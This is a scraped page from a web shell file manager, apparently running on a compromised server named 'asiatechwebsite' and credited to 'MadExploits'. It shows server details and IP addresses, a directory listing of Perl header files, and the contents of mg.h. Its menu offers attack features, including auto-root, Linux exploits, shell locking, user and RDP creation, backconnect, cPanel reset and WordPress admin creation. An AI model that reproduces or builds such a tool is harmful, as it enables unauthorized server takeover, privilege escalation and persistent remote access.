Linux asiatechwebsite 3.10.0-1160.144.1.el7.tuxcare.els3.x86_64 #1 SMP Fri Mar 6 13:52:53 UTC 2026 x86_64
Apache
: 10.190.0.3 | : 216.73.216.156
2134 Domain
7.4.33
asiatechinc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib64 /
perl5 /
CORE /
[ HOME SHELL ]
Name
Size
Permission
Action
EXTERN.h
1.77
KB
-rw-r--r-T
INTERN.h
1.47
KB
-rw-r--r-T
XSUB.h
21.27
KB
-rw-r--r-T
av.h
2.91
KB
-rw-r--r-T
bitcount.h
850
B
-rw-r--r-T
charclass_invlists.h
9.55
KB
-rw-r--r-T
config.h
145.13
KB
-rw-r--r-T
cop.h
39.64
KB
-rw-r--r-T
cv.h
9.22
KB
-rw-r--r-T
dosish.h
5.95
KB
-rw-r--r-T
embed.h
84.98
KB
-rw-r--r-T
embedvar.h
19.08
KB
-rw-r--r-T
fakesdio.h
3.24
KB
-rw-r--r-T
fakethr.h
1.92
KB
-rw-r--r-T
feature.h
3.69
KB
-rw-r--r-T
form.h
1.43
KB
-rw-r--r-T
git_version.h
357
B
-rw-r--r-T
gv.h
10.02
KB
-rw-r--r-T
handy.h
53.01
KB
-rw-r--r-T
hv.h
23.67
KB
-rw-r--r-T
intrpvar.h
27.19
KB
-rw-r--r-T
iperlsys.h
47.63
KB
-rw-r--r-T
keywords.h
6.45
KB
-rw-r--r-T
l1_char_class_tab.h
31.86
KB
-rw-r--r-T
libperl.so
1.57
MB
-rwxr-xr-t
malloc_ctl.h
1.48
KB
-rw-r--r-T
metaconfig.h
899
B
-rw-r--r-T
mg.h
2.37
KB
-rw-r--r-T
mg_data.h
4.84
KB
-rw-r--r-T
mg_raw.h
4.21
KB
-rw-r--r-T
mg_vtable.h
9.14
KB
-rw-r--r-T
mydtrace.h
1.81
KB
-rw-r--r-T
nostdio.h
3.37
KB
-rw-r--r-T
op.h
32.07
KB
-rw-r--r-T
op_reg_common.h
4.33
KB
-rw-r--r-T
opcode.h
46.2
KB
-rw-r--r-T
opnames.h
8.05
KB
-rw-r--r-T
overload.h
2.98
KB
-rw-r--r-T
pad.h
12.77
KB
-rw-r--r-T
parser.h
5.38
KB
-rw-r--r-T
patchlevel.h
8.05
KB
-rw-r--r-T
perl.h
168.47
KB
-rw-r--r-T
perlapi.h
5.34
KB
-rw-r--r-T
perldtrace.h
1.77
KB
-rw-r--r-T
perlio.h
10.83
KB
-rw-r--r-T
perliol.h
13.21
KB
-rw-r--r-T
perlsdio.h
4.92
KB
-rw-r--r-T
perlsfio.h
2.64
KB
-rw-r--r-T
perlvars.h
8.49
KB
-rw-r--r-T
perly.h
5.67
KB
-rw-r--r-T
pp.h
18.37
KB
-rw-r--r-T
pp_proto.h
10.61
KB
-rw-r--r-T
proto.h
259.12
KB
-rw-r--r-T
reentr.h
79.05
KB
-rw-r--r-T
regcharclass.h
30.79
KB
-rw-r--r-T
regcomp.h
32.46
KB
-rw-r--r-T
regexp.h
28.7
KB
-rw-r--r-T
regnodes.h
37.97
KB
-rw-r--r-T
scope.h
9.64
KB
-rw-r--r-T
sv.h
72.44
KB
-rw-r--r-T
thread.h
11.67
KB
-rw-r--r-T
time64.h
1.4
KB
-rw-r--r-T
time64_config.h
1.98
KB
-rw-r--r-T
uconfig.h
144.66
KB
-rw-r--r-T
unixish.h
4.48
KB
-rw-r--r-T
utf8.h
24.78
KB
-rw-r--r-T
utfebcdic.h
34.07
KB
-rw-r--r-T
util.h
1.71
KB
-rw-r--r-T
uudmap.h
904
B
-rw-r--r-T
warnings.h
4.23
KB
-rw-r--r-T
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mg.h
/* mg.h * * Copyright (C) 1991, 1992, 1993, 1994, 1995, 1996, 1997, 1999, * 2000, 2002, 2005, 2006, 2007, 2008 by Larry Wall and others * * You may distribute under the terms of either the GNU General Public * License or the Artistic License, as specified in the README file. * */ #ifdef STRUCT_MGVTBL_DEFINITION STRUCT_MGVTBL_DEFINITION; #else struct mgvtbl { int (*svt_get) (pTHX_ SV *sv, MAGIC* mg); int (*svt_set) (pTHX_ SV *sv, MAGIC* mg); U32 (*svt_len) (pTHX_ SV *sv, MAGIC* mg); int (*svt_clear)(pTHX_ SV *sv, MAGIC* mg); int (*svt_free) (pTHX_ SV *sv, MAGIC* mg); int (*svt_copy) (pTHX_ SV *sv, MAGIC* mg, SV *nsv, const char *name, I32 namlen); int (*svt_dup) (pTHX_ MAGIC *mg, CLONE_PARAMS *param); int (*svt_local)(pTHX_ SV *nsv, MAGIC *mg); }; #endif struct magic { MAGIC* mg_moremagic; MGVTBL* mg_virtual; /* pointer to magic functions */ U16 mg_private; char mg_type; U8 mg_flags; I32 mg_len; SV* mg_obj; char* mg_ptr; }; #define MGf_TAINTEDDIR 1 /* PERL_MAGIC_envelem only */ #define MGf_MINMATCH 1 /* PERL_MAGIC_regex_global only */ #define MGf_REFCOUNTED 2 #define MGf_GSKIP 4 /* skip further GETs until after next SET */ #define MGf_COPY 8 /* has an svt_copy MGVTBL entry */ #define MGf_DUP 0x10 /* has an svt_dup MGVTBL entry */ #define MGf_LOCAL 0x20 /* has an svt_local MGVTBL entry */ #define MgTAINTEDDIR(mg) (mg->mg_flags & MGf_TAINTEDDIR) #define MgTAINTEDDIR_on(mg) (mg->mg_flags |= MGf_TAINTEDDIR) #define MgTAINTEDDIR_off(mg) (mg->mg_flags &= ~MGf_TAINTEDDIR) #define MgPV(mg,lp) ((((int)(lp = (mg)->mg_len)) == HEf_SVKEY) ? \ SvPV(MUTABLE_SV((mg)->mg_ptr),lp) : \ (mg)->mg_ptr) #define MgPV_const(mg,lp) ((((int)(lp = (mg)->mg_len)) == HEf_SVKEY) ? \ SvPV_const(MUTABLE_SV((mg)->mg_ptr),lp) : \ (const char*)(mg)->mg_ptr) #define MgPV_nolen_const(mg) (((((int)(mg)->mg_len)) == HEf_SVKEY) ? \ SvPV_nolen_const(MUTABLE_SV((mg)->mg_ptr)) : \ (const char*)(mg)->mg_ptr) #define SvTIED_mg(sv,how) (SvRMAGICAL(sv) ? mg_find((sv),(how)) : NULL) #define SvTIED_obj(sv,mg) \ ((mg)->mg_obj ? (mg)->mg_obj : sv_2mortal(newRV(sv))) #define whichsig(pv) whichsig_pv(pv) /* * Local variables: * c-indentation-style: bsd * c-basic-offset: 4 * indent-tabs-mode: t * End: * * ex: set ts=8 sts=4 sw=4 noet: */
Close